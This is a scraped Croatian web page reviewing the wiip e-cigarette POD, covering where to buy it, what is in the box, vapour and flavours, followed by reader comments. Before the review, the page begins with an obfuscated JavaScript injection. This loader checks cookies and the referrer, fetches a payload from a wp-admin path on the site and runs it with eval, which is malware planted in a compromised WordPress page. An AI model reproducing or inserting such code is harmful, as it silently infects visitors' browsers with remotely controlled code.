;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
wiip e cigareta POD

wiip recenzija – prvi dojmovi

Da znamo, ova wiip recenzija malo kasni. Prvo smo napravili review za Veev iako je wiip bio prije na tržištu. No Veev je bio nešto “novo”, wiip je već više manje ufuran, no mislim da nikada nije kasno za naše viđenje tog uređaja.

I dok wiip recenziraju (i koriste) neke poznate face estrade, naš pristup će biti isključivo sa stajališta – vrijedi li to ili ne.

Zašto mislimo da je naše mišljenje bitno?
Pa i nije. Ali imamo nekoliko godina vaperskog staža iza sebe.

Imali smo prilike prisustvovati razvoju tehnologije e cigareta od samih početaka. Metodom pokušaja i pogreške smo otkrivali što je a što nije ispravan način parenja. Koji uređaji vrijede a koji ne. Koji uređaji su efektivni u odvikavanju od pušenja a koji ne. U ostalom, i mi sami smo se odvikli od pušenja prije XY godina zahvaljujući e cigaretama, a tada nije bilo 5% današnjeg odabira.

Tako da na wiip i slične uređaje možemo gledati iz jedne druge perspektive – prošli smo to, znamo što radi a što ne.

Uz to sve, još smo i profesionalno vezani s vape branšom. U bliskom smo kontaktu s korisnicima i čujemo njihova realna mišljenja.

No krenimo mi dalje da vidimo što nam ova wiip recenzija kaže.

Gdje kupiti wiip?

Gdje kupiti wiip? Nismo niti mi znali pa smo prvo pitali Google. Google sve zna.

Došli smo na wiip web stranicu i tamo na popisu prodajnih mjesta apsolutni kaos. Ekipa iz Vape Technology-a je označila apsolutno svaki kiosk na kojem se uređaj da kupit. No to nije obavezno loša stvar.

gdje kupiti wiip
gdje kupiti wiip

Uz malo muke (preko mobitela) uspjeli smo zumirat našu lokaciju i pogledali na kojim kioscima Tiska i eNovina se wiip prodaje. Ispada da doslovce na svim. (Vjerojatno ga ima i po benzinskim crpkama – nismo taj dio istražili).

Došetali smo se do prvog, naravno onog najbližeg kioska, teta kaže “nema”. Ništa, idemo dalje. Drugi kiosk:”Imate wiip?”, teta kaže nema. I tako smo prošli jedno četiri kioska u kvartu dok ga nismo našli.

U principu je velika prednost to što ga je potencijalno moguće kupiti doslovce ispred zgrade, ukoliko ga na kiosku imaju.

Šta teta iz kioska zna o prodaji e cigareta?

Ništa.

Mora li nešto znati? Pa kod ovakvih uređaja i ne.

Kupnja je izuzetno jednostavna kao i što je bio slučaj kod kupnje veev-a. Iako je ugodnije kupovati na nekakvom prodajnom mjestu sa nekakvim službenim prodavaćem jer imaš nekako osječaj sigurnosti. To što kupuješ je nešto novo, nešto o čemu kupac ne zna ništa, očekuje nekakve informacije no njih u biti nema.

Dođeš, tražiš, dobiš, platiš, voziš. Nekakve informacije i nisu potrebne, osim ako vas baš ne zanima nešto posebno al tu ćete se morati posavjetovati internetom, društvenim mrežama i slično.

SLIMS banner

Što se nalazi u kutiji?

Kutija je nešto manja, u njoj dolazi wiip POD uređaj, dva wiipoda i USB kabel. Nešto sitno uputa i to je to. Eh da, dolazi i trakica koju stavite na wiip uređaj a služi kako bi ga obijesili oko vrata (svog vrata, ne kućnih vrata, valjda).

wiip sadržaj kutijice
wiip sadržaj kutijice

Nije nam ponuđeno da biramo okuse koji dolaze s njim. Nismo sigurni niti postoji li to kao mogućnost. U paketu su dva okusa, duhanski (Virginia Tobacco) i voćni (jagoda). Od drugih korisnika smo dobili preporuku da uzmemo još i mango, koji je navodno jako dobar. To ćemo nabaviti za onu iduću 24 satnu wiip recenziju.

wiip je izrađen solidno. Aluminijsko kućište, poprilično mali, izuzetno lagan.

wiipodovi su pakirani zasebno, u mini blisterima. Ništa specijalno.

wiipod
wiipod

Nismo mogli birati jačinu wiipodova, dobili smo ih jačine 10mg, 1.6ml. 10mg nikotina u e tekućini i standardnijem vape uređaju je sasvim dovoljno za odvikavanje i naj okorjelijih pušaća, no kako to funkcionira na POD-u – pročitajte u nastavku.

Kako se koristi wiip?

Pa jednostavno.
Maknete wiipod iz pakiranja, maknete donju i gornju silikonsku zaštitu i umetnete ga u uređaj.

Za razliku od veev uređaja – ovdje je svejedno na koji način umetnete wiipod, što je dobro, plus.

Kada umetnete wiipod i pritisnete ga, on “škljocne”.

Ono što je po nama odmah prednost je ta silikonska zaštita s gornje strane koju možete jednostavno vratiti nazad kako vam ne bi u sam usnik wiipod upadale mrvice iz torbe, džepa. Čini se kao možda beznačajna stvar – ali nije, poprilično korisno.

Uređaj se također ne mora palit pritiskom na gumb, što je po nama još jedan plus. Wiipod se jednostavno umetne i uređaj je spreman za korištenje.

Sam uređaj na sebi ima jednu LED lampicu koja se pali prilikom povlaćenja. Vrlo vjerojatno i označava kraj baterije. Što ćemo tek otkriti kada dođe na red 24 satna wiip recenzija.

No tu dolazimo do jedne zamjerke a to je da wiipod “cvrkuće” i koji puta “grglja” prilikom povlaćenja. Kolega Viktor će bit presretan. To smo primjetili samo na duhanskom wiipodu, na voćnom ne.

Kako wiip radi?

Generacija pare je po našem mišljenju solidna do dobra. Para je topla, puna i ima određenu težinu. To će zadovoljiti i zamijeniti onaj osječaj koji pušaći imaju prilikom pušenja – a to je vrlo bitna stavka.

U Veev recenziji smo naveli da veev generira istu količinu pare kao wiip. No nakon ovog detaljnijeg testa možemo reći da to definitivno nije točno. Wiip ima puno kvalitetniju generaciju pare.

Sam okus je puno intenzivniji, no jednostavan, što je i za očekivati od takvih uređaja. Sam okus se osjeti već prilikom povlaćenja pare, a intenzivniji je kod ispuhivanja.

Hoće li wiip zadovoljiti nekoga tko prelazi sa cigarete na e cigaretu – mogoao bi.

Hoće li zadovoljiti nekoga tko je vaper na standardnim uređajima – poslužio bi definitivno kao “backup” uređaj.

Sam protok zraka je po našem mišljenju optimalan za MTL način parenja (mouth to lung). Nije prezatvoren što ispada simulacija cuclanja plastike. Niti je preotvoren da ne bi mogao biti MTL. To je također jedna od prednosti spram prethodno testiranog.

wiipod okusi

Okus Virginia duhanskog wiipoda je sladunjav. Prije bi rekao da je u pitanju neki blagi kakao nego duhan. To ne znači da je loše, dapače – nije loše. No hoće li biti dobro nekome tko tek prelazi s cigareta? Bojimo se da ne, malo je previše sladunjavo.

Okus jagode je također solidan iako se na momente javlja kemijski aftertaste. Sladunjav je. Recimo kao okus bombona ili žvakače gume. Sam okus ima i dodani efekt hlađenja što ćete osjetiti najviše na usnama. Nekima će to hlađenje biti fora, nekima ne.

Za kraj

Ovo je prva wiip recenzija – namjeravamo uređaj koristiti još nekoliko dana nakon čega ćemo napisati dodatna zapažanja. Wiip će također recenzirati i kolega Viktor i kolegica Ivana, gdje ćemo vidjeti što se točno nalazi unutar wiipoda.

Pratite nas i dalje na svim društvenim mrežama te Vaper Pub Youtube kanalu!

Choose your Reaction!
 • Imala sam Wiip u početku. Šta mi se svidjelo… Okusi al uglavnom voćni… Mango vrh, zatim Tropic i mentol… Duhanske su mi bile grozne. Izgled, malen, sladak. Mane su… Baterija mi kratko trajala i skupi podovi.

 • ja svoj poklanjam ako netko hoce, ionako ce na podovima zaronit :) jedno vrijeme sam punio te podove. sve u svemu vise patnje nego uzivanja. ali moram priznat da je mango bio odlican, volio bih znati recept, pa cak i za virginu. ako netko ima spoznaju sto rabe, bio bih zahvalan :)

  • Meni Virginia i USA Mix nisu bili loši, voćkice sam probao bio iz radoznalosti, ali nije to moj đir pa nisam ni forsirao. I onda mi je nakon 2 mjeseca korištenja baterija ispustila dušu pa sam otišao dalje. I to je najbolje što se je s Wiipom moglo dogoditi, meni osobno, jel ;)

 • Wow, ovo su puno pozitivniji dojmovi neg sam mislila da ce bit 😀
  Za skidanje s cigareta mislim da nije, jer dudlala sam dnevno pod 18 mg i jedva cekala spuškat koju Iqos cigaretcicu. Tad sam kao bila na skidanju s Iqosa, jel xD Oba duhanska okusa koma, dok za jagodu i mango moram priznat da nisu losi. Podovi vole curiti, a povremeno i pljuju, dost entuzijasticno. Uglavnom, skupo i glupo.

 • Evo moja,Wiip je bio moj prvi pokušaj bijega od cigareta.Zašto Wiip?Jer je bio u svim storyima na Instagramu itd,činio se kao nešto najprihvatljivije i nisam morala puno istraživati.Naravno kupila,došlo,prvih par dana sve 5,nema primjedbi jer sam uz njega pušila i cigarete.E kad sam htjela cigarete izbaciti,evo problema,punjenje mi trajalo 1 dan max,a košta 25kn,baterija trajala 40min max,više na punjaču nego u korištenju,a i podovi su curili,te znali doći pokvareni(okusom).Kroma Z rulz!

  • Baš sam na Ženski recenziraj čitala da je svima wiip curio, ja sam 2 mjeseca bila na Izy vape i nikad mi se to nije dogodilo, čak mi je i baterija trajala cijeli dan , ali brate mili…neisplativo, minimalno 30-35 kn dnevno.

   • upravo to, meni je pod trajao doslovno 1 dan, duze mi je kutija cigareta trajala LOL

 • Pozdrav. Ja sam skoro pa 2 mjeseca taj Wiip paril. Ne zna se tko je više koga pario, on mene ili ja njega. Ne velim da je to loše, onako za zeka peku, ali za “flaster” kao pomoć pri prestanku rokanja cigareta i nije neka sreća. Al’ eto, ja sam si te patrone razvlačio po dan i pol do 2, kako kad. Rokao sam samo one od 18mg nikotina, probao sve igrom slučaja, no ipak sam najviše čistih duhanskih na njemu popario. Znači, Virginia i USA Mix. Ne bih ja to nikome tko bježi sa duhana preporučio.

Leave a Comment